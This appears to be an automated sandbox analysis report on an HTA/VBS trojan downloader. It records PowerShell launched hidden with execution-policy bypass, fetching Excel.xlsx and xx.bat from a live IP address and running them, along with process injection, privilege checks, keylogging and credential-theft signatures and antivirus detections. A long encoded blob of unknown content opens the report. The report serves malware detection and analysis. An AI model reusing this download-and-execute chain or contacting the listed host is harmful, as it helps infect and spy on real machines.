r6IzwKa1VbXY4TREZlfV2uBLFVsnpc1+ViVvtK/bLtk3RwiEFfJFubPLfE5H4Gl5xMnLR1+lGk8OUDXG9oaR4Dx6pUkamETd+0ZmrmxJWtVwUrVcC+hKGt7DbpoANmPIzcAj9ZXZZ7ZDVf2yiJX+aqX5c6kozL6SxXwDs0/94YXkLkStvLsOYOnuBC3uSliy0bRP3Zm3cRSM/0JUtfDg4sdSGnjUEjC0wdNWXUDDX5muzITxj8APjEUjnke95wCaxqLr3GkoHQNa1GRZcj26qNtjxmN1NX1IT3Z1950baa/bliiTZb04w2bnKXKTa7dEkXkIfD2+Gd9idW7ozGu45KdiAnMzDHrAzekkhC8yMfXOI2o6bLdhOUp9Be5+n96/Of1BLobhAXRnG8yCnwdfJJgQy7WeQxwW6yCAOVQ2f2kcQpKJvwtnXRSLwMVRBWhAjRKABDyH2CFTv13mv2JdlbnfGG/pg46VvhbnBBgRyhgf62tdIHFmsKcIsRhB4mdYAg3e6k8GyOWkjqx8mRdmGOZmifVqKqiBAKrFoJVN0E8EMaopGTeF1/OnduVzAvH+aGOfmyxi+dCnx5rsz7KgScL6tH2OdJYDcXmib4bp38w/acfy9NNo3KmBhSXoMUWpeHHnQpex6SYBm7Ag/9Po7nqYoNbUgdUESJV+RxZicATarKMWsvHh3LDe5niB28a0B0ABnP/yXRL7g7J4YT5Kv7Gl7kjVLs8KrOv5PadQKSoFB2e76q2MA55FR1/m2m1YXU9ZOM5W+fqtZZqvzfwnLFM+8FdgAYUWvLNR04yJPnZSixcjBvJIekkis6NezaMJk0n6UC9wXBSd03ec+ohbZ6ZrwqhcDzPBiE8wx0LJckuisavRitsmVhAJbYZnHzBdj77E+9ltrL1Jf0qF+c5q90oEg3Fk2WNKnrYTueIs6QVS29Jmyd2jd1r+rvbC+JTpUF3GSPCMOFfpRm+D7Vh1l16P3CjcyIhjo7EQRGgsZTymoB57FOEAoQfrOVK5IQosPAhdQXXwtwbiCxpZfTe8MwzydXzC74DBBVbUlAPbscFejr/7niUiByxvlAhR6vK1jzmKjM3Wti7MsKET1zVZ0X7nNbhd+CEnto7bpMS2XOQT5Fhg04/UqV2op+HEEquUoMQbwiNWezDKe4U6Ky1NrlzrB9fVdtS82RXouEjTn71Xapg3uVSngpP75lWjJeNq5Ll4RGkWriJRWgCW+O7nAhktB4LaEc0ZF+nnlJLj6Hdc5H1rf9yZpTL9VaHUnIccuLOGT4XXF/DcHXpmT3PlKXgFzMB1q5Cu5LJbwLf2BlFAjysszcOJZQO8fiPPerQ+B+NAZML5af2coTgzfN2o594DdXCGzAIbqW0XezC52/KmC01/2803WjnqVo62P8aOcdS/yHKu0FGC8TIvIX8riao5/RTde7HsVRwGoDjAQqu/9i7LoKp0oVrn8p/rmFGjuoqV9Tduj7X4bgJbwjFf7kmfGoPuVQG

Poweshell is sending data to a remote host (2 events)

Data sent	GET /Excel.xlsx HTTP/1.1 Host: 193.222.96.143:7287 Connection: Keep-Alive
Data sent	GET /xx.bat HTTP/1.1 Host: 193.222.96.143:7287

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 9, 2024, 10:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 9, 2024, 10:59 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Communicates with host for which no DNS query was performed (1 event)

host

193.222.96.143

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Roaming\Excel.xlsx
file	C:\Users\test22\AppData\Roaming\xx.bat

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send May 9, 2024, 10:59 a.m.	buffer: GET /Excel.xlsx HTTP/1.1 Host: 193.222.96.143:7287 Connection: Keep-Alive socket: 1436 sent: 79	1	79	0
send May 9, 2024, 10:59 a.m.	buffer: GET /xx.bat HTTP/1.1 Host: 193.222.96.143:7287 socket: 884 sent: 51	1	51	0

Libraries known to be associated with a CVE were requested (may be False Positive) (1 event)

cve	CVE-2013-3906

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\xx.bat"
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\xx.bat
parent_process	powershell.exe	martian_process	"C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\Excel.xlsx

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2980 resumed a thread in remote process 3056
NtResumeThread May 9, 2024, 10:59 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3056	1	0	0

Creates a suspicious Powershell process (3 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-w hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Cynet	Malicious (score: 99)
Skyhigh	HTA/Downloader.f
ALYac	VB:Trojan.Valyria.7482
VIPRE	VB:Trojan.Valyria.7482
Arcabit	VB:Trojan.Valyria.D1D3A
ESET-NOD32	VBS/Agent.QVR
McAfee	HTA/Downloader.f
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.7482
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
FireEye	VB:Trojan.Valyria.7482
Ikarus	Trojan.VBS.Agent
Google	Detected
Avira	VBS/Dldr.Agent.VPLT
GData	VB:Trojan.Valyria.7482
Varist	VBS/Agent.AZC!Eldorado
MAX	malware (ai score=81)
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All